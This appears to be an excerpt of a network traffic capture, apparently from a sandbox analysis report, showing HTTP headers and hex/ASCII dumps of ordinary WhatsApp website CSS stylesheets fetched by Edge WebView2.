                                                                                                                                                                                                                permissions-policy-report-only: clipboard-write=();report-to="permissions_policy"
                                                                                                                                                                                                                permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), clipboard-read=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                content-md5: Jwm0p/KRYVtstnyIIpocMw==
                                                                                                                                                                                                                X-FB-Debug: /IbKlPWsIXyAwfIH4MvvilrH4S3TwbQCoOCcDfWeSEuD5T8H845tzdD5tLH1bgANF8eFQMO83pIY/bV2mSRN7A==
                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:09 GMT
                                                                                                                                                                                                                X-FB-Connection-Quality: MODERATE; q=0.3, rtt=204, rtx=0, c=14, mss=1274, tbw=3337, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 32 31 31 38 32 0d 0a 66 6f 72 6d 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 23 36 30 36 37 37 30 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 6c 61 62 65 6c 20 69 6e 70 75 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 7d 74 65 78 74 61 72 65 61 2c 2e 69 6e 70 75 74 74 65 78 74 2c 2e 69 6e 70 75 74 70 61 73 73 77 6f 72 64 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 33 70 78
                                                                                                                                                                                                                Data Ascii: 21182form{margin:0;padding:0}label{color:#606770;cursor:default;font-weight:600;vertical-align:middle}label input{font-weight:normal}textarea,.inputtext,.inputpassword{-webkit-appearance:none;border:1px solid #ccd0d5;border-radius:0;margin:0;padding:3px
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 67 6e 3a 6c 65 66 74 7d 64 64 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 64 74 7b 63 6f 6c 6f 72 3a 23 36 30 36 37 37 30 7d 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 61 62 62 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 68 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 61 64 64 65 31 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 3b 63 6f 6c 6f 72 3a 23 64 61 64 64 65 31 3b 68 65 69 67 68 74 3a 31 70 78 7d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 27 2e 27 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b
                                                                                                                                                                                                                Data Ascii: gn:left}dd{color:#000}dt{color:#606770}ul{list-style-type:none;margin:0;padding:0}abbr{border-bottom:none;text-decoration:none}hr{background:#dadde1;border-width:0;color:#dadde1;height:1px}.clearfix:after{clear:both;content:'.';display:block;font-size:0;
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 67 3a 30 3b 77 69 64 74 68 3a 32 30 30 70 78 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 55 49 46 75 6c 6c 50 61 67 65 5f 43 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 20 31 32 70 78 20 30 3b 77 69 64 74 68 3a 39 34 30 70 78 7d 2e 65 6d 70 74 79 5f 6d 65 73 73 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 36 66 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 20 32 30 70 78 20 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 73 65 65 5f 61 6c 6c 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 2e 73 74 61 6e 64 61 72 64 5f 73 74 61 74 75 73 5f
                                                                                                                                                                                                                Data Ascii: g:0;width:200px;word-wrap:break-word}.UIFullPage_Container{margin:0 auto;padding:20px 12px 0;width:940px}.empty_message{background:#f5f6f7;font-size:13px;line-height:17px;padding:20px 20px 50px;text-align:center}.see_all{text-align:right}.standard_status_
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 5f 39 74 32 6a 20 2e 5f 39 74 32 6c 20 2e 5f 39 76 63 76 20 2e 5f 39 76 64 35 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 38 70 78 7d 2e 5f 39 74 32 6a 20 2e 5f 39 74 32 6c 20 2e 5f 39 76 64 36 7b 68 79 70 68 65 6e 73 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 32 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 5f 39 74 32 69 20 2e 5f 39 74 32 6a 20 2e 5f 39 74 32 6c 20 2e 5f 39 76 64 36 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 5f 39 74 32 69 20 2e 5f 39 74 32 6c 20 2e 5f 39 76 64 36 3e 2e 5f 39 76 64 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33
                                                                                                                                                                                                                Data Ascii: n:underline}._9t2j ._9t2l ._9vcv ._9vd5{padding-right:8px}._9t2j ._9t2l ._9vd6{hyphens:auto;margin-bottom:32px;word-break:break-word}._9t2i ._9t2j ._9t2l ._9vd6:first-child{display:none;height:100%}._9t2i ._9t2l ._9vd6>._9vd5{font-size:12px;line-height:13
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 20 2e 5f 61 65 5f 74 7b 67 61 70 3a 32 34 70 78 7d 2e 5f 61 65 5f 76 20 2e 5f 39 76 64 35 2c 2e 5f 61 65 5f 76 20 2e 5f 39 76 63 76 20 2e 5f 39 76 64 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 5f 61 65 6f 6d 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 5f 61 65 6f 6d 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 5f 61 65 6f 6d 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78
                                                                                                                                                                                                                Data Ascii: ._ae_t{gap:24px}._ae_v ._9vd5,._ae_v ._9vcv ._9vd5{font-size:12px;line-height:16px;padding:0}._aeom{align-self:center;justify-content:center}._aeom:first-child{justify-content:flex-start}._aeom:last-child{justify-content:flex-end}@media (min-width: 768px
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 2d 67 72 6f 77 3a 31 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 5f 61 65 5f 76 20 2e 5f 39 76 64 35 2c 2e 5f 61 65 5f 76 20 2e 5f 39 76 63 76 20 2e 5f 39 76 64 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 5f 39 74 32 69 20 2e 5f 39 74 32 6b 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 7d 2e 5f 61 65 6f 6b 7b 77 69 64 74 68 3a 31 36 30 70 78 7d 2e 5f 61 65 5f 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 35 70 78 7d 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 2e 5f 39 74 32 69 2c 2e 5f 39 79 31 36 20 2e 5f 39 74 32 69 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 0a 40 6d 65 64 69 61 20 28 6d 69 6e
                                                                                                                                                                                                                Data Ascii: -grow:1;justify-content:center}._ae_v ._9vd5,._ae_v ._9vcv ._9vd5{font-size:12px;line-height:26px;padding:0}._9t2i ._9t2k{border-top:none}._aeok{width:160px}._ae_s{display:flex;padding-top:45px}}@media print{._9t2i,._9y16 ._9t2i{display:none}}@media (min
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC1500INData Raw: 6d 73 3a 66 6c 65 78 2d 65 6e 64 7d 2e 5f 39 62 67 2d 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 5f 39 62 68 30 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 5f 39 62 68 31 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 5f 39 62 68 32 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 61 72 6f 75 6e 64 7d 2e 5f 39 62 68 33 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 5f 39 62 68 34 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 65 76 65 6e 6c 79 7d 2e 5f 39 62 68 36 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 74 72 65 74 63 68 7d 2e 5f 39 62 68 37 7b 66 6c 65 78
                                                                                                                                                                                                                Data Ascii: ms:flex-end}._9bg-{align-items:flex-start}._9bh0{justify-content:center}._9bh1{justify-content:flex-end}._9bh2{justify-content:space-around}._9bh3{justify-content:space-between}._9bh4{justify-content:space-evenly}._9bh6{justify-content:stretch}._9bh7{flex
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC1500INData Raw: 30 25 7d 2e 5f 39 62 68 65 7b 77 69 64 74 68 3a 35 38 2e 33 33 33 25 7d 2e 5f 39 62 68 66 7b 77 69 64 74 68 3a 36 36 2e 36 36 36 25 7d 2e 5f 39 62 68 67 7b 77 69 64 74 68 3a 37 35 25 7d 2e 5f 39 62 68 68 7b 77 69 64 74 68 3a 38 33 2e 33 33 33 25 7d 2e 5f 39 62 68 69 7b 77 69 64 74 68 3a 39 31 2e 36 36 36 25 7d 2e 5f 39 62 68 6a 7b 77 69 64 74 68 3a 31 30 30 25 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 33 39 70 78 29 7b 2e 5f 39 62 68 6b 7b 77 69 64 74 68 3a 38 2e 33 33 33 25 7d 2e 5f 39 62 69 76 7b 77 69 64 74 68 3a 31 36 2e 36 36 36 25 7d 2e 5f 39 62 69 77 7b 77 69 64 74 68 3a 32 35 25 7d 2e 5f 39 62 69 78 7b 77 69 64 74 68 3a 33 33 2e 33 33 33 25 7d 2e 5f 39 62 69 79 7b 77 69 64 74 68 3a 34 31 2e 36 36 36 25 7d 2e 5f 39 62 69 7a
                                                                                                                                                                                                                Data Ascii: 0%}._9bhe{width:58.333%}._9bhf{width:66.666%}._9bhg{width:75%}._9bhh{width:83.333%}._9bhi{width:91.666%}._9bhj{width:100%}}@media (max-width: 639px){._9bhk{width:8.333%}._9biv{width:16.666%}._9biw{width:25%}._9bix{width:33.333%}._9biy{width:41.666%}._9biz
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC1500INData Raw: 20 2e 5f 39 76 63 76 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 7d 2e 5f 61 64 68 63 20 2e 5f 38 6c 5f 66 20 6f 6c 2c 2e 5f 61 64 68 63 20 2e 5f 38 6c 5f 66 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 7d 2e 5f 61 64 68 63 20 2e 5f 38 6c 5f 66 20 75 6c 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 30 70 78 7d 2e 5f 61 64 68 63 20 2e 5f 37 67 7a 35 2c 2e 5f 61 64 68 63 20 6c 69 2c 2e 5f 61 64 68 63 20 6c 69 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 30 7d 2e 5f 61 6c 6c 67 20 2e 5f 61 64 68 63 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 5f 61 64 68 63 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 34 70 78 7d 2e 5f 61 64 68 63 20 68 32 7b 66 6f 6e 74
                                                                                                                                                                                                                Data Ascii: ._9vcv{font-size:inherit}._adhc ._8l_f ol,._adhc ._8l_f ul{margin:0}._adhc ._8l_f ul{padding-left:40px}._adhc ._7gz5,._adhc li,._adhc li{margin:1em 0}._allg ._adhc{display:flex;flex-grow:1}@media (min-width: 768px){._adhc h1{font-size:64px}._adhc h2{font
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC1500INData Raw: 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 36 70 78 7d 2e 5f 39 72 5f 37 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 31 70 78 7d 2e 5f 39 72 5f 37 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 39 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 7d 2e 5f 39 72 5f 37 20 68 33 2e 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 5f 39 72 5f 37 20 68 34 2c 2e 5f 39 72 5f 37 20 2e 5f 37 67 7a 35 2c 2e 5f 39 72 5f 37 20 70 2c 2e 5f 39 72 5f 37 20 6c 69 2c 2e 5f 39 72 5f 37 20 6f 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 7d 2e 5f 39 72 5f 37 20 68 34 2e 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30
                                                                                                                                                                                                                Data Ascii: ight:700;line-height:36px}._9r_7 h2{font-size:24px;line-height:31px}._9r_7 h3{font-size:19px;line-height:26px}._9r_7 h3.bold{font-weight:700}._9r_7 h4,._9r_7 ._7gz5,._9r_7 p,._9r_7 li,._9r_7 ol{font-size:16px;line-height:26px}._9r_7 h4.bold{font-weight:70


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                7192.168.2.44975531.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC657OUTGET /rsrc.php/v3/yx/l/0,cross/_K0hEQYGPlg.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                                                                                                                                                Host: static.whatsapp.net
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                Referer: https://www.whatsapp.com/
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1680INHTTP/1.1 200 OK
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                Expires: Fri, 28 Feb 2025 23:48:07 GMT
                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                permissions-policy-report-only: clipboard-read=(), clipboard-write=();report-to="permissions_policy"
                                                                                                                                                                                                                permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), clipboard-write=(self), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                content-md5: TTHzaz+Fb2Yilw1ZTi8HYA==
                                                                                                                                                                                                                X-FB-Debug: iz1oUbWB1I0ufWFzZ2KrhsiOkWGmO3mU/w1PVn5TKOMAZU8KkGteraIiQmjS6ig6zs20nOl/1zqEEKlinyjudQ==
                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:09 GMT
                                                                                                                                                                                                                X-FB-Connection-Quality: MODERATE; q=0.3, rtt=203, rtx=0, c=14, mss=1274, tbw=3338, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 33 31 64 32 0d 0a 2e 5f 39 79 31 36 20 2e 5f 39 74 6a 72 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 7d 2e 55 49 49 6e 74 65 72 6e 70 61 67 65 5f 43 6f 6e 74 65 6e 74 20 2e 5f 39 74 6a 72 2c 2e 5f 39 74 6a 72 2c 2e 5f 39 79 31 36 20 2e 5f 39 74 6a 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 32 38 63 37 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 36 31 70 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30
                                                                                                                                                                                                                Data Ascii: 31d2._9y16 ._9tjr{font-family:Roboto, Helvetica Neue, Helvetica, Arial, sans-serif}.UIInternpage_Content ._9tjr,._9tjr,._9y16 ._9tjr{align-items:center;background-color:#128c7e;display:flex;height:61px;justify-content:center;max-width:100%;min-width:100
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 5f 61 6b 67 76 20 2e 5f 61 66 2d 32 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 55 49 49 6e 74 65 72 6e 70 61 67 65 5f 43 6f 6e 74 65 6e 74 20 2e 5f 61 66 2d 32 2c 2e 5f 61 66 77 31 2c 2e 5f 61 66 77 64 7b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 5f 61 66 76 78 2c 2e 5f 61 6b 67 76 20 2e 5f 61 66 76 78 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70
                                                                                                                                                                                                                Data Ascii: nter;max-width:100%;min-width:100%;position:fixed;top:0;z-index:1000}._akgv ._af-2{display:flex}.UIInternpage_Content ._af-2,._afw1,._afwd{z-index:1}._afvx,._akgv ._afvx{align-items:center;box-sizing:border-box;display:flex;justify-content:space-between;p
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 5f 61 66 2d 31 20 2e 5f 61 66 77 69 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 62 32 32 32 32 7d 2e 5f 61 69 63 79 20 2e 5f 61 66 77 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 35 64 33 36 36 7d 2e 5f 61 69 63 79 20 2e 5f 61 66 77 6a 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 33 37 2c 20 32 31 31 2c 20 31 30 31 2c 20 2e 38 29 7d 2e 5f 61 66 77 6a 2e 5f 61 67 34 76 2c 2e 5f 61 67 34 76 2e 5f 61 66 77 6b 7b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3a 6e 6f 6e 65 3b 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d
                                                                                                                                                                                                                Data Ascii: isplay:none}._af-1 ._afwi{border-bottom:1px solid #0b2222}._aicy ._afwk{background-color:#25d366}._aicy ._afwj{background-color:rgba(37, 211, 101, .8)}._afwj._ag4v,._ag4v._afwk{-webkit-backdrop-filter:none;backdrop-filter:none;background:#fff}@media (min-
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 2d 6c 65 66 74 3a 35 32 30 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 33 34 30 70 78 29 7d 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 2e 5f 39 74 6a 72 2c 2e 5f 61 66 77 6b 2c 2e 5f 39 79 31 36 20 2e 5f 39 74 6a 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 0a 2e 5f 61 65 62 35 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 5f 61 65 62 36 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 30 29 20 73 63 61 6c 65 28 31 29 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 61 65 62 37 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 7d 2e 5f 61 65 62 38 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67
                                                                                                                                                                                                                Data Ascii: -left:520px;transform:translateY(-340px)}}@media print{._9tjr,._afwk,._9y16 ._9tjr{display:none}}._aeb5{opacity:0}._aeb6{max-width:100%;opacity:1;transform:translate(0) scale(1);width:100%}._aeb7{transition-timing-function:linear}._aeb8{transition-timing
                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 31 30 30 25 7d 2e 5f 61 66 6f 68 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 5f 61 66 6f 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 5f 61 66 6f 67 3a 3a 61 66 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 35 64 33 36 36 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 63 6f 6e 74 65 6e 74 3a 27 27 3b 68 65 69 67 68 74 3a 32 70 78 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 77 69 64 74 68 20 2e 33 33 73 20 6c 69 6e 65 61 72 3b 77 69 64 74 68 3a 30 25 7d 2e 5f 61 66 6f 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 35 64 33 36 36 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 68 65 69 67 68 74 3a 33 32 70 78 3b 6d 61 72 67 69 6e 2d 72 69
                                                                                                                                                                                                                Data Ascii: 100%}._afoh{color:#fff}._afog{position:relative}._afog::after{background-color:#25d366;bottom:-2px;content:'';height:2px;left:0;position:absolute;transition:width .33s linear;width:0%}._afoi{background-color:#25d366;border-radius:50%;height:32px;margin-ri
